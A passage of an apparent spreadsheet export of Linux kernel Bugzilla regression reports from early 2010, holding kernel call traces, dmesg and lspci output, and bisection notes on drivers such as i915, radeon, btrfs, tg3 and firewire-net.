Jan 9 20:42:39 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:42:39 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:43:19 grainlead-lx kernel: INFO: task i915/1:70 blocked for more than 120 seconds. Jan 9 20:43:19 grainlead-lx kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Jan 9 20:43:19 grainlead-lx kernel: i915/1 D 00000207 0 70 2 0x00000000 Jan 9 20:43:19 grainlead-lx kernel: f7092180 00000046 00000002 00000207 eb9fa5b0 eb9fa5b0 f7092180 43b7f029 Jan 9 20:43:19 grainlead-lx kernel: 00000df4 c28082e0 ebbf3c00 c14472a0 c14472a0 43b7e647 00000df4 f7092330 Jan 9 20:43:19 grainlead-lx kernel: c1442764 f7092330 c14472a0 c14472a0 c2a03800 00000002 f6887f4c f6887f48 Jan 9 20:43:19 grainlead-lx kernel: Call Trace: Jan 9 20:43:19 grainlead-lx kernel: [&lt;c12b7dea&gt;] ? __mutex_lock_slowpath+0x10a/0x2c0 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c12b7fa8&gt;] ? mutex_lock+0x8/0x20 Jan 9 20:43:19 grainlead-lx kernel: [&lt;f824310a&gt;] ? i915_gem_retire_work_handler+0x2a/0x80 [i915] Jan 9 20:43:19 grainlead-lx kernel: [&lt;f82430e0&gt;] ? i915_gem_retire_work_handler+0x0/0x80 [i915] Jan 9 20:43:19 grainlead-lx kernel: [&lt;c1056fdf&gt;] ? worker_thread+0x11f/0x260 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c105ae50&gt;] ? autoremove_wake_function+0x0/0x40 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c1056ec0&gt;] ? worker_thread+0x0/0x260 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c105aba4&gt;] ? kthread+0x74/0x80 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c105ab30&gt;] ? kthread+0x0/0x80 Jan 9 20:43:19 grainlead-lx kernel: [&lt;c1004627&gt;] ? kernel_thread_helper+0x7/0x10 Jan 9 20:43:44 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:43:44 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:43:44 grainlead-lx kernel: Jan 9 20:43:44 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:43:44 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:43:44 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:43:44 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:43:44 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:43:44 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:43:44 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:43:44 grainlead-lx kernel: DR0: 0</t>
  </si>
  <si>
    <t>kexec regression, radeon/kms irq related (bisected)</t>
  </si>
  <si>
    <t>2010-01-09 18:49 UTC</t>
  </si>
  <si>
    <t>Markus Trippelsdorf</t>
  </si>
  <si>
    <t>2010-01-26 12:16 UTC</t>
  </si>
  <si>
    <t>Commit d8f60cfc93452d0554f6a701aa8e3236cbee4636 (drm/radeon/kms: Add support for interrupts on r6xx/r7xx chips) breaks kexec on my machine (amd64, RS780). The computer just hangs right after the kexec call and I have to press the reset button to get it running again. 2.6.32 worked flawlessly.</t>
  </si>
  <si>
    <t>agpgart sometimes fails to initialize sometimes</t>
  </si>
  <si>
    <t>2010-01-09 23:31 UTC</t>
  </si>
  <si>
    <t>2010-10-26 09:35 UTC</t>
  </si>
  <si>
    <t>On T500 with 2.6.32.1 agpgart sometimes fails to initialize which results in displaying errors: [ 4.276354] Linux agpgart interface v0.103 [ 4.738113] [drm] Initialized drm 1.1.0 20060810 [ 5.075234] i915 0000:00:02.0: power state changed by ACPI to D0 [ 5.075241] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 5.075244] i915 0000:00:02.0: setting latency timer to 64 [ 5.075260] [drm:drm_fill_in_dev] *ERROR* Cannot initialize the agpgart module. [ 5.075265] i915 0000:00:02.0: PCI INT A disabled [ 5.075269] i915: probe of 0000:00:02.0 failed with error -22 [ 5.075320] agpgart-intel 0000:00:00.0: Intel Mobile Intel® GM45 Express Chipset [ 5.076833] agpgart-intel 0000:00:00.0: detected 32764K stolen memory [ 5.080520] agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0xd0000000 As oppose to: [ 3.053571] Linux agpgart interface v0.103 [ 3.189171] agpgart-intel 0000:00:00.0: Intel Mobile Intel® GM45 Express Chipset [ 3.190737] agpgart-intel 0000:00:00.0: detected 32764K stolen memory [ 3.194308] agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0xd0000000 [ 4.281443] [drm] Initialized drm 1.1.0 20060810 [ 4.343881] i915 0000:00:02.0: power state changed by ACPI to D0 [ 4.343893] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 4.343896] i915 0000:00:02.0: setting latency timer to 64 [ 4.357989] i915 0000:00:02.0: irq 31 for MSI/MSI-X [ 4.357995] [drm] set up 31M of stolen space [ 4.635800] fb0: inteldrmfb frame buffer device [ 4.638952] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 5.918313] [drm] LVDS-8: set mode 1680x1050 c (Found by grep -P '(i9|agp|drm)')</t>
  </si>
  <si>
    <t>i915: Resume regression on MSI Wind U100 w/o KMS</t>
  </si>
  <si>
    <t>2.6.33-rc3-635b3c9d5508</t>
  </si>
  <si>
    <t>2010-01-10 13:12 UTC</t>
  </si>
  <si>
    <t>2010-01-11 22:30 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] DRM / i915: Fix resume regression on MSI Wind U100 w/o KMS Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2010-01-08 23:45 References : http://marc.info/?l=linux-kernel&amp;m=126299433427673&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://patchwork.kernel.org/patch/71887/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>netdevice.h change from 2.6.31 blocks realtek r8169 driver from compiling</t>
  </si>
  <si>
    <t>2010-01-10 16:34 UTC</t>
  </si>
  <si>
    <t>Pascal Delaunay</t>
  </si>
  <si>
    <t>2012-06-18 14:36 UTC</t>
  </si>
  <si>
    <t>bug in fs/btrfs/ordered-data.c:672</t>
  </si>
  <si>
    <t>btrfs</t>
  </si>
  <si>
    <t>2.6.33-rc</t>
  </si>
  <si>
    <t>2010-01-10 20:57 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:44 UTC</t>
  </si>
  <si>
    <t>fs_btrfs@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc2+ bug in fs/btrfs/ordered-data.c:672 Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2010-01-02 11:32 References : http://lkml.org/lkml/2010/1/2/17 Handled-By : "Yan, Zheng " &lt;yanzheng@21cn.com&gt; Patch : http://www.mail-archive.com/linux-btrfs@vger.kernel.org/msg03686.html This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drm: gem_object_free without struct_mutex</t>
  </si>
  <si>
    <t>2010-01-10 21:06 UTC</t>
  </si>
  <si>
    <t>2010-01-11 23:49 UTC</t>
  </si>
  <si>
    <t>Subject : drm: gem_object_free without struct_mutex Submitter : Hugh Dickins &lt;hugh.dickins@tiscali.co.uk&gt; Date : 2009-12-30 19:45 References : http://marc.info/?l=linux-kernel&amp;m=126220236201529&amp;w=4 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>volano ~30% regression</t>
  </si>
  <si>
    <t>2010-01-10 21:10 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:43 UTC</t>
  </si>
  <si>
    <t>Subject : volano ~30% regression with 2.6.33-rc1 &amp; -rc2 Submitter : Lin Ming &lt;ming.m.lin@intel.com&gt; Date : 2010-01-04 8:15 References : http://marc.info/?l=linux-kernel&amp;m=126259391411982&amp;w=4 Handled-By : Mike Galbraith &lt;efault@gmx.de&gt; Patch : http://patchwork.kernel.org/patch/70623/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel paging request in rs600_gart_set_page()</t>
  </si>
  <si>
    <t>2010-01-10 21:14 UTC</t>
  </si>
  <si>
    <t>2010-01-18 19:39 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: unable to handle kernel paging request on 2.6.33-rc2 Submitter : Xiaotian Feng &lt;dfeng@redhat.com&gt; Date : 2010-01-05 19:10 References : http://lkml.org/lkml/2010/1/5/95 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>soft lockup in dmesg after suspend/resume</t>
  </si>
  <si>
    <t>2010-01-10 21:24 UTC</t>
  </si>
  <si>
    <t>2011-01-16 22:13 UTC</t>
  </si>
  <si>
    <t>Subject : [regression]: soft lockup in dmesg after suspend/resume Submitter : ykzhao &lt;yakui.zhao@intel.com&gt; Date : 2010-01-04 5:36 References : http://marc.info/?l=linux-kernel&amp;m=126258356202722&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG during shutdown - bisected to commit e2912009</t>
  </si>
  <si>
    <t>2010-01-10 21:32 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:42 UTC</t>
  </si>
  <si>
    <t>Subject : BUG during shutdown - bisected to commit e2912009 Submitter : Marc Dionne &lt;marc.c.dionne@gmail.com&gt; Date : 2010-01-02 0:27 References : http://marc.info/?l=linux-kernel&amp;m=126239207631034&amp;w=4 Handled-By : Xiaotian Feng &lt;dfeng@redhat.com&gt; Patch : http://patchwork.kernel.org/patch/71537/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drm/ksm: fbdev blanking regression</t>
  </si>
  <si>
    <t>2010-01-10 21:39 UTC</t>
  </si>
  <si>
    <t>2010-01-26 11:58 UTC</t>
  </si>
  <si>
    <t>Subject : [bisected] drm/ksm: fbdev blanking regression in 2.6.33 Submitter : Johan Hovold &lt;jhovold@gmail.com&gt; Date : 2010-01-06 17:00 References : http://marc.info/?l=linux-kernel&amp;m=126279726418748&amp;w=4 Handled-By : James Simmons &lt;jsimmons@infradead.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Bisected to: commit 731b5a15a3b1474a41c2ca29b4c32b0f21bc852e Author: James Simmons &lt;jsimmons@infradead.org&gt; Date: Thu Oct 29 20:39:07 2009 +0000 drm/kms: properly handle fbdev blanking I examined several fbdev drivers and foudn the blanking code in drm_fb_helper to be wrong. This patch fixes the fbdev blanking to behave like other fbdev drivers. Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt; First-Bad-Commit : 731b5a15a3b1474a41c2ca29b4c32b0f21bc852e</t>
  </si>
  <si>
    <t>leds_alix2: can't allocate I/O for GPIO</t>
  </si>
  <si>
    <t>2010-01-10 21:46 UTC</t>
  </si>
  <si>
    <t>2010-03-21 19:56 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc3 regression: leds_alix2: can't allocate I/O for GPIO Submitter : Arnd Hannemann &lt;hannemann@nets.rwth-aachen.de&gt; Date : 2010-01-07 10:26 References : http://marc.info/?l=linux-kernel&amp;m=126286001106257&amp;w=4 Handled-By : Daniel Mack &lt;daniel@caiaq.de&gt; Patch : http://patchwork.kernel.org/patch/72006/ This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Display goes off with i915.powersave=1 after suspend-resume</t>
  </si>
  <si>
    <t>2.6.32-rc3-git</t>
  </si>
  <si>
    <t>2010-01-10 22:06 UTC</t>
  </si>
  <si>
    <t>2010-02-19 10:26 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc3-git display goes off with i915.powersave=1 Submitter : Soeren Sonnenburg &lt;sonne@debian.org&gt; Date : 2010-01-10 20:09 References : http://marc.info/?l=linux-kernel&amp;m=126315457519505&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lvds downclocking breaks on G45/thinkpad T500</t>
  </si>
  <si>
    <t>2010-01-11 22:07 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:59 UTC</t>
  </si>
  <si>
    <t>Subject : lvds downclocking breaks on G45/thinkpad T500 Submitter : Andres Freund &lt;andres@anarazel.de&gt; Date : 2009-12-26 16:49 References : http://marc.info/?l=linux-kernel&amp;m=126184839608352&amp;w=4 Handled-By : ykzhao &lt;yakui.zhao@intel.com&gt; This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline. Caused by: commit 18f9ed12f8c977e25d65a16af8e8d73f72417ba1 Author: Zhao Yakui &lt;yakui.zhao@intel.com&gt; Date: Fri Nov 20 03:24:16 2009 +0000 drm/i915: Enable LVDS downclock feature through EDID. Signed-off-by: Zhao Yakui &lt;yakui.zhao@intel.com&gt; Reviewed-by: Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : 18f9ed12f8c977e25d65a16af8e8d73f72417ba1</t>
  </si>
  <si>
    <t>No connectivity with tg3 since 87668d352aa8d135bd695a050f18bbfc7b50b506</t>
  </si>
  <si>
    <t>2.6.33-rcX</t>
  </si>
  <si>
    <t>2010-01-13 08:22 UTC</t>
  </si>
  <si>
    <t>Matthieu Verbert</t>
  </si>
  <si>
    <t>2010-01-15 21:53 UTC</t>
  </si>
  <si>
    <t>The following commit broke (at least) DHCP on my Dell D830: commit 87668d352aa8d135bd695a050f18bbfc7b50b506 Author: Matt Carlson &lt;mcarlson@broadcom.com&gt; Date: Fri Nov 13 13:03:34 2009 +0000 tg3: Don't touch RCB nic addresses Note that it may break all kinds of networking stuff with my hardware, but I have no access to any LAN where I can use a fixed IP address... I bisecting the issue and simply reverting this single commit (on top of 2.6.33-rc4 for instance) makes the adapter functional again. lspci -vvv -nn -xxx returns: 09:00.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme BCM5755M Gigabit Ethernet PCI Express [14e4:1673] (rev 02) Subsystem: Dell Device [1028:01fe] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 32 Region 0: Memory at f9bf0000 (64-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;ignored&gt; [disabled] Capabilities: [48] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data Product Name: Broadcom NetXtreme Gigabit Ethernet Controller Read-only fields: [PN] Part number: BCM95755m [EC] Engineering changes: 01FE.004 [SN] Serial number: 0123456789 [MN] Manufacture ID: 31 34 65 34 [RV] Reserved: checksum good, 28 byte(s) reserved Read/write fields: [YA] Asset tag: XYZ01234567 [RW] Read-write area: 107 byte(s) free End Capabilities: [58] Vendor Specific Information &lt;?&gt; Capabilities: [e8] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 41b9 Capabilities: [d0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;4us, L1 unlimited ExtTag+ AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 4096 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;64us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM L0s Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM+ AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr+ BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Capabilities: [13c] Virtual Channel &lt;?&gt; Capabilities: [160] Device Serial Number 00-1d-09-ff-fe-d9-90-10 Capabilities: [16c] Power Budgeting &lt;?&gt; Kernel driver in use: tg3 00: e4 14 73 16 06 05 10 00 02 00 00 02 10 00 00 00 10: 04 00 bf f9 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 28 10 fe 01 30: 00 00 01 0c 48 00 00 00 00 00 00 00 0a 01 00 00 40: 00 00 00 00 00 00 00 00 01 50 03 c0 08 20 00 64 50: 03 58 fc 80 00 00 00 78 09 e8 78 00 11 0c 00 60 60: 00 00 00 00 00 00 00 00 98 02 02 a0 00 00 18 76 70: f2 10 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 80: e4 14 73 16 00 00 00 00 34 00 13 04 82 f0 08 ec 90: 19 db 00 01 00 00 00 a2 00 00 00 00 2f 01 00 00 a0: 00 00 00 00 67 00 00 00 00 00 00 00 4a 01 00 00 b0: 00 00 00 00 00 00 00 dd 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 d0: 10 00 01 00 a0 8f 04 05 00 50 10 00 11 6c 07 00 e0: 41 01 11 10 00 00 00 00 05 d0 81 00 0c 30 e0 fe f0: 00 00 00 00 b9 41 00 00 00 00 00 00 00 00 00 00 Let me know if you want me to test any other patch... Thanks, Matthieu</t>
  </si>
  <si>
    <t>[ath5k] led doesn't work on 3Com Corporation 3CRPAG175 Wireless PC Card</t>
  </si>
  <si>
    <t>2.6.31-gentoo-r6</t>
  </si>
  <si>
    <t>2010-01-15 14:05 UTC</t>
  </si>
  <si>
    <t>Bram Verweij</t>
  </si>
  <si>
    <t>2010-03-04 22:38 UTC</t>
  </si>
  <si>
    <t>I recently changed from madwifi-ng to the in-kernel ath5k driver. The ath5k driver connects to my wireless network just fine. However, with the ath5k driver the led on the so-called x-jack antenna of my pcmcia wireless card does not work. It used to work quite well with madwifi-ng. I.e., it would blink fast with high throughput and slowly with low throughput. Here is a link to the product page: http://www.3com.com/products/en_US/detail.jsp?tab=features&amp;pathtype=purchase&amp;sku=3CRPAG175 Here is the relevant output of lspci -vnn: 04:00.0 Ethernet controller [0200]: 3Com Corporation 3CRPAG175 Wireless PC Card [a727:0013] (rev 01) Subsystem: 3Com Corporation Device [10b7:1026] Flags: bus master, medium devsel, latency 168, IRQ 7 Memory at 84000000 (32-bit, non-prefetchable) [size=64K] Capabilities: [44] Power Management version 2 Kernel driver in use: ath5k Kernel modules: ath5k While looking for a solution, I came across http://bugzilla.kernel.org/show_bug.cgi?id=14607. It proposes an easy solution for a similar bug. I tried to add { ATH_SDEVICE(PCI_VENDOR_ID_3COM, 0x1026), ATH_LED(x, y) } to the led.c file as suggested in the above link. I tried all values of x and y with x in {0, 1, 2, 3} and y in {0, 1}. None would work. Next, I noticed that my old madwifi-ng driver contained the code: if (sc-&gt;sc_softled) { ath_hal_gpioCfgOutput(ah, sc-&gt;sc_ledpin); ath_hal_gpioset(ah, sc-&gt;sc_ledpin, !sc-&gt;sc_ledon); } in the file if_ath.c, in the function ath_attach. I added a printk printing the value of sc-sc_softled, and those of sc-&gt;sc_ledpin and sc-&gt;sc_ledon. It turned out that sc-&gt;sc_softled was 0. From this my conclusion is that adding a line in the led.c file will not fix the led on my wireless card. Is that correct? I'm hoping somebody can give me some suggestions on what to try next... Bram</t>
  </si>
  <si>
    <t>no deep C-states on core-i7, thus no turbo</t>
  </si>
  <si>
    <t>2.6.31-17-generic-pae</t>
  </si>
  <si>
    <t>Anders Aagaard</t>
  </si>
  <si>
    <t>2010-02-17 16:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 24575 [details] sysbench cpu tests with 1 thread, 4 threads and 8 threads I have a alienware m15x, with "Turbo mode" enabled in the bios. In windows it appears to be working properly, but in linux (which is my main enviroment) it doesn't look like it's working. I've seen this with multiple programs, I'm attaching sysbench output. Running 1 thread I get: avg: 61.71ms Running 4 threads I get: avg: 60.64ms Running 8 threads I get: avg: 112.34ms This is a i7 quad core, so I expected the drop between 4 and 8 threads. But running a single thread should be a higher average as the turbo boost should kick in. See this bug on the ubuntu launchpad: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/429036 I believe the original report relates to an issue that might already be solved, but comment #3 is seeing the same thing I am. He also has some info in comment #9 where he says it's only his mobile i7's that are affected. I've also tried using the "i7z" tool found here: http://code.google.com/p/i7z/ To monitor my performance, now I thought the math was off because of hyperthreading so the original bugreport is a bit misleading, but there's some more information here: http://code.google.com/p/i7z/issues/detail?id=1</t>
  </si>
  <si>
    <t>EC init fails? - Constant ACPI temperature, no fan control, hot system throttles - Compaq Presario C700 Notebook PC</t>
  </si>
  <si>
    <t>2010-01-16 04:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 24580 [details] acpidump This laptop reported by user has always run very hot, with fan coming on periodically even when at idle. Thermal zone temp reported is incorrect and probably fooling the throttling logic.</t>
  </si>
  <si>
    <t>kernel mode switching broken on i830</t>
  </si>
  <si>
    <t>2010-01-16 14:15 UTC</t>
  </si>
  <si>
    <t>2012-04-18 21:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 24597 [details] full dmesg with kms enabled. I'm having problems with an i830 chipset when kernel mode switching is enabled. I'm running 2.6.32.3 kernel, Debian's 2.6.32-5. After upgrading to the latest version of X in unstable, KMS got enabled, and things broke for me. When KMS is disabled, everything works properly. When X starts, the i915 module gets loaded and this shows up in the log: [ 55.021263] [drm] Initialized drm 1.1.0 20060810 [ 55.293251] pci 0000:00:02.0: PCI INT A -&gt; Link[LNKA] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 55.293269] pci 0000:00:02.0: setting latency timer to 64 [ 55.314396] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 When modesetting is enabled, I get this instead: [ 55.049322] [drm] Initialized drm 1.1.0 20060810 [ 55.253696] i915 0000:00:02.0: PCI INT A -&gt; Link[LNKA] -&gt; GSI 10 (level, low) -&gt; IRQ 10 [ 55.253713] i915 0000:00:02.0: setting latency timer to 64 [ 55.272730] [drm] set up 7M of stolen space [ 55.566079] [drm] DAC-6: set mode 640x480 0 [ 56.150306] fb: conflicting fb hw usage inteldrmfb vs VESA VGA - removing generic driver [ 56.151501] fb1: inteldrmfb frame buffer device [ 56.151508] registered panic notifier [ 56.151525] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 56.319592] [drm] LVDS-8: set mode 1024x768 b [ 57.103488] [drm] DAC-6: set mode 640x480 0 [ 57.611480] [drm] DAC-6: set mode 640x480 0 [ 58.798400] [drm] DAC-6: set mode 1024x768 19 [ 58.964037] [drm] LVDS-8: set mode 1024x768 1a [ 63.094242] [drm] LVDS-8: set mode 1024x768 b [ 66.987543] [drm] DAC-6: set mode 640x480 0 [ 67.492465] [drm] DAC-6: set mode 640x480 0 This has several effects: - The console isn't working properly anymore. It displays what was showing in X, but reacts to the keyboard. When X isn't running yet I just get a black screen instead. - gdm still works properly, but after logging in my display gets black. When booting I pass vga=0x305 to the kernel, and I get this in my log: [ 0.892508] vesafb: framebuffer at 0xf0000000, mapped to 0xd0700000, using 768k, total 768k [ 0.892531] vesafb: mode is 1024x768x8, linelength=1024, pages=0 [ 0.892545] vesafb: scrolling: redraw [ 0.892561] vesafb: Pseudocolor: size=0:8:8:8, shift=0:0:0:0 [ 0.898351] Console: switching to colour frame buffer device 128x48 [ 0.903778] fb0: VESA VGA frame buffer device [...] [ 2.298643] agpgart-intel 0000:00:00.0: Intel 830M Chipset [ 2.316497] agpgart-intel 0000:00:00.0: detected 892K stolen memory [ 2.404437] agpgart-intel 0000:00:00.0: AGP aperture is 128M @ 0xf0000000 Kurt</t>
  </si>
  <si>
    <t>IBM/Lenovo Trackpoint speed, sensitivity reset after suspend</t>
  </si>
  <si>
    <t>2010-01-16 16:19 UTC</t>
  </si>
  <si>
    <t>Marten Vance</t>
  </si>
  <si>
    <t>2010-02-14 23:46 UTC</t>
  </si>
  <si>
    <t>Hi, I encountered a slight regression from 2.6.31 to 2.6.32 concerning the settings for speed and sensitivity of my Lenovo x61t trackpoint after a suspend/resume-cycle: They're reset to 97 and 128, respectively. This applies only if the settings are written into sysfs (/sys/devices/platform/i8042/serio1/{speed,sensitivity}). If there are udev-rules present to set the values they remain unchanged (or are re-set automatically after resume?). After resume I can write the desired values back into sysfs successfully. So there seems to be nothing broken, only the values are lost. (See also http://bugzilla.kernel.org/show_bug.cgi?id=14970#c11) This is on Archlinux with a default kernel only enhanced by including the patch from http://bugzilla.kernel.org/show_bug.cgi?id=14970 to re-enable the recognition of the trackpoint device. Suspending and resuming is carried out by pm-utils. Thanks and cheers, Marten</t>
  </si>
  <si>
    <t>firewire-net: panic in prio_tree_left (was in fwnet_write_complete)</t>
  </si>
  <si>
    <t>2010-01-17 15:11 UTC</t>
  </si>
  <si>
    <t>2010-11-06 08:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 24607 [details] screenshot of panic in fwnet_write_complete Reported at http://marc.info/?l=linux1394-devel&amp;m=126341793319333 on 2010-01-13: &gt;&gt;&gt; I run Archlinux x86, kernel 2.6.32.2-2 is from it's repo. The system falls to kernel panic when I copy lots of files (10Gb) from laptop with rsync or other progs via firewire. This happens in 90% cases within 1 minute of copying. Moving mouse or hitting keys on the keyboard make kernel panic sooner. lesser MTU value has no effect. I had no kernel panic yet with "-maxcpus=1" boot option. cpu is C2D E6550 -------------------- # lspci ... 04:03.0 FireWire (IEEE 1394): Agere Systems FW322/323 (rev 70) -------------------- traces look like this (see the screenshot: http://www.postimage.org/image.php?v=Pq1AO6Dr ): -------------------- ... Call Trace: [&lt;xxxxxxxx&gt;] ? ip_rcv_finish+0xeb/0x390 [&lt;xxxxxxxx&gt;] ? close_transaction+0xda/0xf0 [firewire_core] [&lt;xxxxxxxx&gt;] ? handle_at_packet+0xa1/0x100 [firewire_ohci] ... EIP: [&lt;xxxxxxxx&gt;] fwnet_write_complete+0x2c/0x160 [firewire_net] SS:ESP 0068:f7079e40 ... &lt;&lt;&lt;</t>
  </si>
  <si>
    <t>s2ram is broken for (un-)docked T400</t>
  </si>
  <si>
